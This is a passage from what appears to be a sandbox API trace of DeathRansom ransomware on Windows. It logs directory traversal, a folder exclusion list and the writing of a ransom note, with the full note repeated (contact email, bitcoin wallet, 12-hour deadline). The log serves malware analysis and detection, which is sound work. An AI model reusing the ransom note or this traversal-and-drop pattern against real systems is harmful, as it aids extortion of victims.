dwReserved1=0x2e0000, cFileName="Indexed Locations.search-ms", cAlternateFileName="\x07")) returned 0xffffffff [0076.655] wnsprintfW (in: pszDest=0x8cd0070, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\Default\\Templates\\read_me.txt") returned 42 [0076.655] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Templates\\read_me.txt" (normalized: "c:\\users\\default\\templates\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7c4 [0076.655] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: ju9lcFFu56zzLExlZx2cW2ifvxjwfbgwyzul9UBh/BgA3e0IUwZylsyIN9LIO88Tk9b+qSwE8ly+hYxfwQRuemJp8GfcNEpY+aCIUm7NIZewRCyih6eYdUhNDvy3UIFyuYI2leSmGPcDOKXHUY1DxgtKJLdpGHolZYsmMjCSpJqg26CuWE4j975Lg4j5TG7TmV90Mf4Q9KxLGOFHnf0y8Be88DxVi4DSpUG61OVik5NPAUCsr44mft0DSiiDG6lkmMTK8rz/ZXQFplgDjlkFWIjCmJ8z/lzRBeQSGDXHajcXVhm7ole6fDlmmLAqc8JiPF6GJWiXRyC88p/XdmIEM1hyfaUTsIagp3Z4Jcar2Z6fNEN4HOQX4vh70F5mvDA9tNlQ4IGw0HHnAIsio7+XP6C5ESJpCTA56BqT+iYkjiLWnx7aCdkdjLS5GXmyqZwkpJ2pfidiGRAY+K/b4sr6MYxpq3HIsa4yilXCKU6g7nVzaLyRx9Mju7nqi4VzJmsae+7WaeW1JJWG6fDQQDKJ06UcNxKog4qqaFM0hQMpq8DSx8s2ekea+VNJR2RC3KxqGd5vnzP2ko6nan8bbGjQarI0/HCYwMv6YfEg3sQI9Ml0eGAiE54mxl0SQ46Y2c6qJQ8uWWkTrGHfyNeXzJtP1eKU1589G/XMM1nl46l26WpopWGz7EE5WhXprnpvZl+dWoJiaG1pxvThCNWoTFArWQ==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0076.656] WriteFile (in: hFile=0x7c4, lpBuffer=0x4f55310*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17dce4, lpOverlapped=0x0 | out: lpBuffer=0x4f55310*, lpNumberOfBytesWritten=0x17dce4*=0x6b3, lpOverlapped=0x0) returned 1 [0076.656] CloseHandle (hObject=0x7c4) returned 1 [0076.657] GetProcessHeap () returned 0x4f10000 [0076.657] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8cd0070 | out: hHeap=0x4f10000) returned 1 [0076.657] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd8868f0a, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="Videos", cAlternateFileName="")) returned 1 [0076.657] wnsprintfW (in: pszDest=0x8b900d0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Videos") returned 27 [0076.657] lstrcmpW (lpString1="Videos", lpString2="..") returned 1 [0076.657] lstrcmpW (lpString1="Videos", lpString2=".") returned 1 [0076.657] StrStrW (lpFirst="videos", lpSrch="programdata") returned 0x0 [0076.657] StrStrW (lpFirst="videos", lpSrch="$recycle.bin") returned 0x0 [0076.657] StrStrW (lpFirst="videos", lpSrch="program files") returned 0x0 [0076.657] StrStrW (lpFirst="videos", lpSrch="windows") returned 0x0 [0076.657] StrStrW (lpFirst="videos", lpSrch="all users") returned 0x0 [0076.657] StrStrW (lpFirst="videos", lpSrch="appdata") returned 0x0 [0076.657] GetProcessHeap () returned 0x4f10000 [0076.657] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8cd0070 [0076.657] lstrcpyW (in: lpString1=0x8cd0070, lpString2="\\\\?\\C:\\Users\\Default\\Videos" | out: lpString1="\\\\?\\C:\\Users\\Default\\Videos") returned="\\\\?\\C:\\Users\\Default\\Videos" [0076.657] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 121 [0076.657] QueueUserWorkItem (Function=0x40a710, Context=0x8cd0070, Flags=0x0) returned 1 [0076.657] GetProcessHeap () returned 0x4f10000 [0076.657] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8ce0078 [0076.658] wnsprintfW (in: pszDest=0x8ce0078, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\Videos\\*") returned 29 [0076.658] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Videos\\*", lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x24eadda0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24eadda0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x7cfe968 [0076.658] wnsprintfW (in: pszDest=0x8ce0078, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Videos\\.") returned 29 [0076.658] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0076.658] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0076.658] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x24eadda0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24eadda0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0076.659] wnsprintfW (in: pszDest=0x8ce0078, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Videos\\..") returned 30 [0076.659] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0076.659] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd8868f0a, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0076.659] wnsprintfW (in: pszDest=0x8ce0078, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Videos\\desktop.ini") returned 39 [0076.659] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24eadda0, ftCreationTime.dwHighDateTime=0x1d5a041, ftLastAccessTime.dwLowDateTime=0x24eadda0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24eadda0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="read_me.txt", cAlternateFileName="")) returned 1 [0076.659] wnsprintfW (in: pszDest=0x8ce0078, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Videos\\read_me.txt") returned 39 [0076.659] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24eadda0, ftCreationTime.dwHighDateTime=0x1d5a041, ftLastAccessTime.dwLowDateTime=0x24eadda0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24eadda0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="read_me.txt", cAlternateFileName="")) returned 0 [0076.659] FindClose (in: hFindFile=0x7cfe968 | out: hFindFile=0x7cfe968) returned 1 [0076.659] wnsprintfW (in: pszDest=0x8ce0078, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\Default\\Videos\\read_me.txt") returned 39 [0076.659] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Videos\\read_me.txt" (normalized: "c:\\users\\default\\videos\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0076.659] GetProcessHeap () returned 0x4f10000 [0076.659] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8ce0078 | out: hHeap=0x4f10000) returned 1 [0076.659] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd8868f0a, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="videos", cAlternateFileName="")) returned 0 [0076.659] FindClose (in: hFindFile=0x7cfe9a8 | out: hFindFile=0x7cfe9a8) returned 1 [0076.659] wnsprintfW (in: pszDest=0x8b900d0, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\Default\\read_me.txt") returned 32 [0076.659] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\read_me.txt" (normalized: "c:\\users\\default\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7fc [0076.660] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: ju9lcFFu56zzLExlZx2cW2ifvxjwfbgwyzul9UBh/BgA3e0IUwZylsyIN9LIO88Tk9b+qSwE8ly+hYxfwQRuemJp8GfcNEpY+aCIUm7NIZewRCyih6eYdUhNDvy3UIFyuYI2leSmGPcDOKXHUY1DxgtKJLdpGHolZYsmMjCSpJqg26CuWE4j975Lg4j5TG7TmV90Mf4Q9KxLGOFHnf0y8Be88DxVi4DSpUG61OVik5NPAUCsr44mft0DSiiDG6lkmMTK8rz/ZXQFplgDjlkFWIjCmJ8z/lzRBeQSGDXHajcXVhm7ole6fDlmmLAqc8JiPF6GJWiXRyC88p/XdmIEM1hyfaUTsIagp3Z4Jcar2Z6fNEN4HOQX4vh70F5mvDA9tNlQ4IGw0HHnAIsio7+XP6C5ESJpCTA56BqT+iYkjiLWnx7aCdkdjLS5GXmyqZwkpJ2pfidiGRAY+K/b4sr6MYxpq3HIsa4yilXCKU6g7nVzaLyRx9Mju7nqi4VzJmsae+7WaeW1JJWG6fDQQDKJ06UcNxKog4qqaFM0hQMpq8DSx8s2ekea+VNJR2RC3KxqGd5vnzP2ko6nan8bbGjQarI0/HCYwMv6YfEg3sQI9Ml0eGAiE54mxl0SQ46Y2c6qJQ8uWWkTrGHfyNeXzJtP1eKU1589G/XMM1nl46l26WpopWGz7EE5WhXprnpvZl+dWoJiaG1pxvThCNWoTFArWQ==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0076.660] WriteFile (in: hFile=0x7fc, lpBuffer=0x4f55310*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17df5c, lpOverlapped=0x0 | out: lpBuffer=0x4f55310*, lpNumberOfBytesWritten=0x17df5c*=0x6b3, lpOverlapped=0x0) returned 1 [0076.660] CloseHandle (hObject=0x7fc) returned 1 [0076.661] GetProcessHeap () returned 0x4f10000 [0076.661] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b900d0 | out: hHeap=0x4f10000) returned 1 [0076.661] FindNextFileW (in: hFindFile=0x7cfe8e8, lpFindFileData=0x17df70 | out: lpFindFileData=0x17df70*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x240000, cFileName="Default User", cAlternateFileName="DEFAUL~1")) returned 1 [0076.661] wnsprintfW (in: pszDest=0x8ac0068, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default User") returned 25 [0076.661] lstrcmpW (lpString1="Default User", lpString2="..") returned 1 [0076.661] lstrcmpW (lpString1="Default User", lpString2=".") returned 1 [0076.662] StrStrW (lpFirst="default user", lpSrch="programdata") returned 0x0 [0076.662] StrStrW (lpFirst="default user", lpSrch="$recycle.bin") returned 0x0 [0076.662] StrStrW (lpFirst="default user", lpSrch="program files") returned 0x0 [0076.662] StrStrW (lpFirst="default user", lpSrch="windows") returned 0x0 [0076.662] StrStrW (lpFirst="default user", lpSrch="all users") returned 0x0 [0076.662] StrStrW (lpFirst="default user", lpSrch="appdata") returned 0x0 [0076.662] GetProcessHeap () returned 0x4f10000 [0076.662] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8b900d0 [0076.662] lstrcpyW (in: lpString1=0x8b900d0, lpString2="\\\\?\\C:\\Users\\Default User" | out: lpString1="\\\\?\\C:\\Users\\Default User") returned="\\\\?\\C:\\Users\\Default User" [0076.662] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 122 [0076.662] QueueUserWorkItem (Function=0x40a710, Context=0x8b900d0, Flags=0x0) returned 1 [0076.662] GetProcessHeap () returned 0x4f10000 [0076.662] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8ce0078 [0076.662] wnsprintfW (in: pszDest=0x8ce0078, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default User\\*") returned 27 [0076.662] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default User\\*", lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd8868f0a, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="videos", cAlternateFileName="\x07")) returned 0xffffffff [0076.662] wnsprintfW (in: pszDest=0x8ce0078, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\Default User\\read_me.txt") returned 37 [0076.662] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default User\\read_me.txt" (normalized: "c:\\users\\default user\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0076.662] GetProcessHeap () returned 0x4f10000 [0076.662] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8ce0078 | out: hHeap=0x4f10000) returned 1 [0076.662] FindNextFileW (in: hFindFile=0x7cfe8e8, lpFindFileData=0x17df70 | out: lpFindFileData=0x17df70*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x286e4016, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x286e4016, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0xa0000003, dwReserved1=0x240000, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0076.662] wnsprintfW (in: pszDest=0x8ac0068, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\desktop.ini") returned 24 [0076.662] FindNextFileW (in: hFindFile=0x7cfe8e8, lpFindFileData=0x17df70 | out: lpFindFileData=0x17df70*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x917fa2ee, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x240000, cFileName="Public", cAlternateFileName="")) returned 1 [0076.662] wnsprintfW (in: pszDest=0x8ac0068, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public") returned 19 [0076.662] lstrcmpW (lpString1="Public", lpString2="..") returned 1 [0076.662] lstrcmpW (lpString1="Public", lpString2=".") returned 1 [0076.663] StrStrW (lpFirst="public", lpSrch="programdata") returned 0x0 [0076.663] StrStrW (lpFirst="public", lpSrch="$recycle.bin") returned 0x0 [0076.663] StrStrW (lpFirst="public", lpSrch="program files") returned 0x0 [0076.663] StrStrW (lpFirst="public", lpSrch="windows") returned 0x0 [0076.663] StrStrW (lpFirst="public", lpSrch="all users") returned 0x0 [0076.663] StrStrW (lpFirst="public", lpSrch="appdata") returned 0x0 [0076.663] GetProcessHeap () returned 0x4f10000 [0076.663] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8ce0078 [0076.663] lstrcpyW (in: lpString1=0x8ce0078, lpString2="\\\\?\\C:\\Users\\Public" | out: lpString1="\\\\?\\C:\\Users\\Public") returned="\\\\?\\C:\\Users\\Public" [0076.663] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 123 [0076.663] QueueUserWorkItem (Function=0x40a710, Context=0x8ce0078, Flags=0x0) returned 1 [0076.663] GetProcessHeap () returned 0x4f10000 [0076.663] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8cf0080 [0076.664] wnsprintfW (in: pszDest=0x8cf0080, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Public\\*") returned 21 [0076.664] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\*", lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x917fa2ee, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x7cfe9a8 [0076.664] wnsprintfW (in: pszDest=0x8cf0080, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\.") returned 21 [0076.664] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0076.664] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0076.664] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x917fa2ee, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0076.664] wnsprintfW (in: pszDest=0x8cf0080, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\..") returned 22 [0076.664] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0076.664] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0a09a40, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb0a09a40, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="Desktop", cAlternateFileName="")) returned 1 [0076.664] wnsprintfW (in: pszDest=0x8cf0080, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Desktop") returned 27 [0076.664] lstrcmpW (lpString1="Desktop", lpString2="..") returned 1 [0076.665] lstrcmpW (lpString1="Desktop", lpString2=".") returned 1 [0076.665] StrStrW (lpFirst="desktop", lpSrch="programdata") returned 0x0 [0076.665] StrStrW (lpFirst="desktop", lpSrch="$recycle.bin") returned 0x0 [0076.665] StrStrW (lpFirst="desktop", lpSrch="program files") returned 0x0 [0076.665] StrStrW (lpFirst="desktop", lpSrch="windows") returned 0x0 [0076.665] StrStrW (lpFirst="desktop", lpSrch="all users") returned 0x0 [0076.665] StrStrW (lpFirst="desktop", lpSrch="appdata") returned 0x0 [0076.665] GetProcessHeap () returned 0x4f10000 [0076.665] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8d00088 [0076.666] lstrcpyW (in: lpString1=0x8d00088, lpString2="\\\\?\\C:\\Users\\Public\\Desktop" | out: lpString1="\\\\?\\C:\\Users\\Public\\Desktop") returned="\\\\?\\C:\\Users\\Public\\Desktop" [0076.666] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 124 [0076.666] QueueUserWorkItem (Function=0x40a710, Context=0x8d00088, Flags=0x0) returned 1 [0076.666] GetProcessHeap () returned 0x4f10000 [0076.666] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8d10090 [0076.667] wnsprintfW (in: pszDest=0x8d10090, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Public\\Desktop\\*") returned 29 [0076.667] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Desktop\\*", lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0a09a40, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb0a09a40, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x7cfe968 [0076.667] wnsprintfW (in: pszDest=0x8d10090, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Desktop\\.") returned 29 [0076.667] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0076.667] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0076.667] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0a09a40, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb0a09a40, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0076.667] wnsprintfW (in: pszDest=0x8d10090, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Desktop\\..") returned 30 [0076.667] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0076.667] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x83c279c0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x83c279c0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x83c4db20, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x7e9, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Adobe Reader X.lnk", cAlternateFileName="ADOBER~1.LNK")) returned 1 [0076.667] wnsprintfW (in: pszDest=0x8d10090, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Desktop\\Adobe Reader X.lnk") returned 46 [0076.667] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x2826d6cd, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x2826d6cd, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28860dd8, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0076.667] wnsprintfW (in: pszDest=0x8d10090, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Desktop\\desktop.ini") returned 39 [0076.667] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x20, 